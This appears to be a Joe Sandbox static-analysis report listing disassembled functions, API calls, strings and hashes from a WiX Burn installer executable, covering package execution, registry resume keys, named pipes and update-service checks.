Failed to execute MSI package., xrefs: 005B9EA6
Failed to execute MSP package., xrefs: 005B9ECB
Failed to get cache thread exit code., xrefs: 005BA031
Failed to execute compatible package action., xrefs: 005B9F73
Failed to execute dependency action., xrefs: 005B9F36
Failed to load compatible package on per-machine package., xrefs: 005B9F5C
Invalid execute action., xrefs: 005BA056

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: d929de50e381f196bf5cc2123083766e0e908ac1a7e667ac1011ac2e8e15f40b
Instruction ID: d96bf8eaed66bbd8b931dd68951a64874f299270331e7eb89acf6de290daa2d1
Opcode Fuzzy Hash: d929de50e381f196bf5cc2123083766e0e908ac1a7e667ac1011ac2e8e15f40b
Instruction Fuzzy Hash: CA716B71A0126AEBDB15DFA5C945AFE7FB8FB44B10F11456AFA04E7240D730AE009BA1

Function 0059F210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 005D3B3E

RegCloseKey.ADVAPI32(00000000,?,005E0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0059F440

Part of subcall function 005D14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0059F28D,005E0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 005D14BB

Strings

Failed to write Installed value., xrefs: 0059F2B6
Failed to create run key., xrefs: 0059F31D
Failed to write Resume value., xrefs: 0059F293
registration.cpp, xrefs: 0059F3C4, 0059F412
Failed to format resume command line for RunOnce., xrefs: 0059F2F9
Resume, xrefs: 0059F282
BundleResumeCommandLine, xrefs: 0059F348, 0059F3DB
Failed to write resume command line value., xrefs: 0059F35D
Failed to write run key value., xrefs: 0059F33B
burn.runonce, xrefs: 0059F2DA
"%ls" /%ls, xrefs: 0059F2E5
Installed, xrefs: 0059F2A5
Failed to delete run key value., xrefs: 0059F3CE
Failed to delete resume command line value., xrefs: 0059F41C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseValueVersion
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
API String ID: 2348918689-2631711097
Opcode ID: 185ea34f97e266b8afa81bd0c1162e6074afb2e76f1ef5a8ccc36e18ea22c3a7
Instruction ID: 6acdb964241601dc5406e69f3a93d741557711faeb6f4be863c8bbcf9f74fa6c
Opcode Fuzzy Hash: 185ea34f97e266b8afa81bd0c1162e6074afb2e76f1ef5a8ccc36e18ea22c3a7
Instruction Fuzzy Hash: 8F510132D4166AFBCF259BA5CC0ABAEBE64BB00710F150936F904F6290E7B49D509BC4

Function 005BCC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(76228FB0,00000002,00000000), ref: 005BCC9D

Part of subcall function 005A4D8D: UuidCreate.RPCRT4(?), ref: 005A4DC0

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,005B2401,?,?,00000000,?,?,?), ref: 005BCD7B
GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 005BCD85
GetProcessId.KERNEL32(005B2401,?,?,00000000,?,?,?,?), ref: 005BCDBD

Part of subcall function 005A54DC: lstrlenW.KERNEL32(?,?,00000000,?,005DB500,?,00000000,?,0059452F,?,005DB500), ref: 005A54FD
Part of subcall function 005A54DC: GetCurrentProcessId.KERNEL32(?,0059452F,?,005DB500), ref: 005A5508
Part of subcall function 005A54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0059452F,?,005DB500), ref: 005A553F
Part of subcall function 005A54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0059452F,?,005DB500), ref: 005A5554
Part of subcall function 005A54DC: GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A555E
Part of subcall function 005A54DC: Sleep.KERNEL32(00000064,?,0059452F,?,005DB500), ref: 005A5593
Part of subcall function 005A54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55B6
Part of subcall function 005A54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55D1
Part of subcall function 005A54DC: WriteFile.KERNEL32(?,/EY,005DB500,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55EC
Part of subcall function 005A54DC: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,0059452F,?,005DB500), ref: 005A5607

Part of subcall function 005D0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00594F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 005D0A38
Part of subcall function 005D0A28: GetLastError.KERNEL32(?,?,00594F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 005D0A46

CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,005BCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 005BCE41
CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,005BCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 005BCE50
CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,005BCBEF,?,?,?,?,?,00000000,?,?,?), ref: 005BCE67

Strings

Failed to create embedded pipe name and client token., xrefs: 005BCD00
Failed to create embedded process at path: %ls, xrefs: 005BCDB3
Failed to wait for embedded process to connect to pipe., xrefs: 005BCDDF
Failed to wait for embedded executable: %ls, xrefs: 005BCE24
%ls -%ls %ls %ls %u, xrefs: 005BCD40
Failed to allocate embedded command., xrefs: 005BCD54
burn.embedded, xrefs: 005BCD38
Failed to create embedded pipe., xrefs: 005BCD27
Failed to process messages from embedded message., xrefs: 005BCE04
embedded.cpp, xrefs: 005BCDA6

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
API String ID: 875070380-3803182736
Opcode ID: d55820da0922647ff78c2eac2408253caf2ce21940c9cc61fb9aeaa0931663bc
Instruction ID: 63df0c4b5a934d55c213132d6439fdfc8e8bf4cfb464439aa161a984fc4f984f
Opcode Fuzzy Hash: d55820da0922647ff78c2eac2408253caf2ce21940c9cc61fb9aeaa0931663bc
Instruction Fuzzy Hash: 25516076D4122EFBDF229B94DC06BEE7FB9BB44711F110122FA00B6291D774AA409BD4

Function 0059ECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0059EE4C

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

SysFreeString.OLEAUT32(?), ref: 0059EE04

Strings

Filename, xrefs: 0059ED7F
Failed to get next node., xrefs: 0059EEB3
Regid, xrefs: 0059ED9A
Failed to allocate memory for software tag structs., xrefs: 0059ED4B
Failed to get @Regid., xrefs: 0059EE9F
registration.cpp, xrefs: 0059ED41
SoftwareTag, xrefs: 0059ECCD
Failed to get software tag count., xrefs: 0059ED13
Failed to get SoftwareTag text., xrefs: 0059EE8B
Failed to get @Path., xrefs: 0059EE95
Failed to convert SoftwareTag text to UTF-8, xrefs: 0059EE81
Path, xrefs: 0059EDB2
`Dv, xrefs: 0059EE04, 0059EE4C
Failed to get @Filename., xrefs: 0059EEA9
Failed to select software tag nodes., xrefs: 0059ECEE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`Dv$registration.cpp
API String ID: 336948655-2733233106
Opcode ID: 51cea3e6df58b7bb74e5455c4a23b052d53c6258f55a4f46cb7e02b338a96707
Instruction ID: e25ea859b15fa9e7f4899e97eccf59a41c42d9f0715c251f800cf1106fe93ebf
Opcode Fuzzy Hash: 51cea3e6df58b7bb74e5455c4a23b052d53c6258f55a4f46cb7e02b338a96707
Instruction Fuzzy Hash: F9519535E01726FBDF25DF59C886EAEBFA8BF44750B14456AF901AB241CB70DE009790

Function 005D7F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,005D8468,00000001,?), ref: 005D7F9E
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,005D8468,00000001,?), ref: 005D7FB9
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,005D8468,00000001,?), ref: 005D7FD4
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,005D8468,00000001,?), ref: 005D8040
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,005D8468,00000001,?), ref: 005D8064
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,005D8468,00000001,?), ref: 005D8088
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,005D8468,00000001,?), ref: 005D80A8
lstrlenW.KERNEL32(006C0064,?,005D8468,00000001,?), ref: 005D80C3

Strings

msi.dll, xrefs: 005D7F98
digest, xrefs: 005D7FB0
sha1, xrefs: 005D807F
http://appsyndication.org/2006/appsyn, xrefs: 005D7F91
sha256, xrefs: 005D809F
name, xrefs: 005D7FCB
apuputil.cpp, xrefs: 005D80DB
algorithm, xrefs: 005D8037
md5, xrefs: 005D805B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: 45de555b164d9a59bc2255fe52a297294da7105c10b5bb1178a36dd6dcb2d510
Instruction ID: 6dcb2a49ebbb58505ea22f84bfb2106820506e0676d3ab2928329df6d77412fe
Opcode Fuzzy Hash: 45de555b164d9a59bc2255fe52a297294da7105c10b5bb1178a36dd6dcb2d510
Instruction Fuzzy Hash: 79518031649222BBDB305F58CC49F26BE66BB15B30F204717F634AA3E1CBA5E854D790

Function 0059A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059A0B6

Strings

Failed to get product info., xrefs: 0059A1E3
Failed to set variable., xrefs: 0059A23C
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 0059A175
Unsupported product search type: %u, xrefs: 0059A07E
Failed to copy upgrade code., xrefs: 0059A116
VersionString, xrefs: 0059A0A6, 0059A131, 0059A147, 0059A15B, 0059A174, 0059A188
Language, xrefs: 0059A09F
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0059A24F
State, xrefs: 0059A098
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 0059A148
Product or related product not found: %ls, xrefs: 0059A1A1
Failed to format GUID string., xrefs: 0059A0C1
Failed to enumerate related products for upgrade code., xrefs: 0059A0F1
AssignmentType, xrefs: 0059A091
Failed to change value type., xrefs: 0059A21D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: b62796117c37b49fd5dbc1fc9c2f7a0d3794d784567e210a30ddca5ef4c0fdc8
Instruction ID: 7cd7327b5b0722ede4000201d560db38c012ce3e333a2e07daca4823b7ca8ed1
Opcode Fuzzy Hash: b62796117c37b49fd5dbc1fc9c2f7a0d3794d784567e210a30ddca5ef4c0fdc8
Instruction Fuzzy Hash: 98619436940119BBCF21AAA8CD4AEAE7FB9FB45710F104157F905BA251D732DE00E7E2

Function 005A4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 005A4B84
GetLastError.KERNEL32 ref: 005A4B92
Sleep.KERNEL32(00000064), ref: 005A4BB6

Strings

Failed to open companion process with PID: %u, xrefs: 005A4CDE
\\.\pipe\%ls.Cache, xrefs: 005A4C17
Failed to verify parent pipe: %ls, xrefs: 005A4BFE
Failed to allocate name of parent cache pipe., xrefs: 005A4C2B
Failed to open parent pipe: %ls, xrefs: 005A4BDC
Failed to allocate name of parent pipe., xrefs: 005A4B50
feclient.dll, xrefs: 005A4BE9, 005A4C84, 005A4C98, 005A4CDC
\\.\pipe\%ls, xrefs: 005A4B3C
pipe.cpp, xrefs: 005A4BCF, 005A4CD2

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: 023c94b8544cc175f4d9edd078ef366f28dbc73d56fc633f3242eb613eb133e6
Instruction ID: ac40ce64f8b79a1d89439db146489ef827104e3273193b02d1f44286edd033bd
Opcode Fuzzy Hash: 023c94b8544cc175f4d9edd078ef366f28dbc73d56fc633f3242eb613eb133e6
Instruction Fuzzy Hash: 1A41E836D82636FBDB3156E18D0AF5E7E54BF52B30F124212FE04BA290D7A59D009EE4

Function 005B69D2 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 153serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,005B6F28,?), ref: 005B6A0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005B6F28,?,?,?), ref: 005B6A18
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,005B6F28,?,?,?), ref: 005B6A60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005B6F28,?,?,?), ref: 005B6A6C
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,005B6F28,?,?,?), ref: 005B6AA6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005B6F28,?,?,?), ref: 005B6AB0
CloseServiceHandle.ADVAPI32(00000000), ref: 005B6B67
CloseServiceHandle.ADVAPI32(?), ref: 005B6B71

Strings

(o[, xrefs: 005B69F3
Failed to mark WU service to start on demand., xrefs: 005B6B38
wuauserv, xrefs: 005B6A5A
Failed to open service control manager., xrefs: 005B6A46
msuuser.cpp, xrefs: 005B6A3C, 005B6A90, 005B6AD4
Failed to read configuration for WU service., xrefs: 005B6B17
Failed to query status of WU service., xrefs: 005B6ADE
Failed to open WU service., xrefs: 005B6A9A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: (o[$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuuser.cpp$wuauserv
API String ID: 971853308-111885540
Opcode ID: c94c8e2493c4083e80fb187739bf2a9e83af8a9c9b7946f6c39da61b7afee4c8
Instruction ID: 667ed50c3c54a73b303ead9f70d5aa9fa7b40b92f1e53fd3ea22be13bb42a034
Opcode Fuzzy Hash: c94c8e2493c4083e80fb187739bf2a9e83af8a9c9b7946f6c39da61b7afee4c8
Instruction Fuzzy Hash: 4A41C672A41325DBDB219BA98C49EEEBFB5BB44710F158426FD01FB241D778ED009AA0

Function 0059F585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,005A04DF,InstallerVersion,InstallerVersion,00000000,005A04DF,InstallerName,InstallerName,00000000,005A04DF,Date,InstalledDate,00000000,005A04DF,LogonUser), ref: 0059F733

Part of subcall function 005D14F4: RegSetValueExW.ADVAPI32(00020006,005E0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0059F335,00000000,?,00020006), ref: 005D1527

Strings

InstallerName, xrefs: 0059F6E4, 0059F6E9, 0059F6EA, 0059F6FA
InstallerVersion, xrefs: 0059F701, 0059F706, 0059F707, 0059F717
Date, xrefs: 0059F6C9
Failed to write %ls value., xrefs: 0059F71C
LogonUser, xrefs: 0059F6A9
PackageName, xrefs: 0059F5FF, 0059F612
ReleaseType, xrefs: 0059F68A, 0059F68F, 0059F69E
Failed to get the formatted key path for update registration., xrefs: 0059F5A7
InstalledBy, xrefs: 0059F6A4, 0059F6BD
InstalledDate, xrefs: 0059F6C4, 0059F6DD
Failed to create the key for update registration., xrefs: 0059F5D3
ThisVersionInstalled, xrefs: 0059F5DF, 0059F5F2
Publisher, xrefs: 0059F63F, 0059F652
PackageVersion, xrefs: 0059F61F, 0059F632
PublishingGroup, xrefs: 0059F667, 0059F67A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: bf29c1c2b7cc4ff38e9f35cd3c398104fffd0c5eb95de57f4f7e1b1d3bbc325a
Instruction ID: 9539435f31ceddb94c7f1b441af101169d19a62f3723816f8ef8e4700b740820
Opcode Fuzzy Hash: bf29c1c2b7cc4ff38e9f35cd3c398104fffd0c5eb95de57f4f7e1b1d3bbc325a
Instruction Fuzzy Hash: 4441C832A407A6B7DF2A9695CD46EAE7E69FB50B10F150172F900F6352CB709E10E784

Function 005AE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 005AE7FF
RegisterClassW.USER32(?), ref: 005AE82B
GetLastError.KERNEL32 ref: 005AE836
CreateWindowExW.USER32(00000080,005E9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 005AE89D
GetLastError.KERNEL32 ref: 005AE8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 005AE945

Strings

Unexpected return value from message pump., xrefs: 005AE930
WixBurnMessageWindow, xrefs: 005AE824, 005AE940
Failed to create window., xrefs: 005AE8D5
uithread.cpp, xrefs: 005AE85A, 005AE8CB
Failed to register window., xrefs: 005AE864

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: b054537d3d5d5ffae137963038f5b6cb91819d3ed4055eb83efc5b51732bf2d5
Instruction ID: d4a247d1ed3ccac8543469f8516bee11a657bb53aca5ea117dfad2598285f66d
Opcode Fuzzy Hash: b054537d3d5d5ffae137963038f5b6cb91819d3ed4055eb83efc5b51732bf2d5
Instruction Fuzzy Hash: 3E41B472901226EFDB209BA5DC49ADFBFB9FF09B50F114126F904AB240D730AD44DBA0

Function 005BC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to recreate command-line arguments., xrefs: 005BCA43
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 005BC9E7
Failed to copy related arguments for passthrough bundle package, xrefs: 005BCA82
Failed to copy key for passthrough pseudo bundle payload., xrefs: 005BC9C5
pseudobundle.cpp, xrefs: 005BC7A8, 005BC9A1, 005BC9DB
Failed to allocate memory for pseudo bundle payload hash., xrefs: 005BC9AD
Failed to copy install arguments for passthrough bundle package, xrefs: 005BCA62
Failed to copy download source for passthrough pseudo bundle., xrefs: 005BC98F
Failed to copy cache id for passthrough pseudo bundle., xrefs: 005BCA05
Failed to copy filename for passthrough pseudo bundle., xrefs: 005BC9BE
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 005BCAAC
Failed to copy local source path for passthrough pseudo bundle., xrefs: 005BC9B7
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 005BC7B4
Failed to copy key for passthrough pseudo bundle., xrefs: 005BC988

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: 57d74f7c4d26dcb0540de320f00105fdd02d00cd65d75f8c60dd7100a37a55f4
Instruction ID: a5ce03a6f6f9e75f3d72f593824c6fd3bfc16b7db3c0b6a1d9da0176e1597cfe
Opcode Fuzzy Hash: 57d74f7c4d26dcb0540de320f00105fdd02d00cd65d75f8c60dd7100a37a55f4
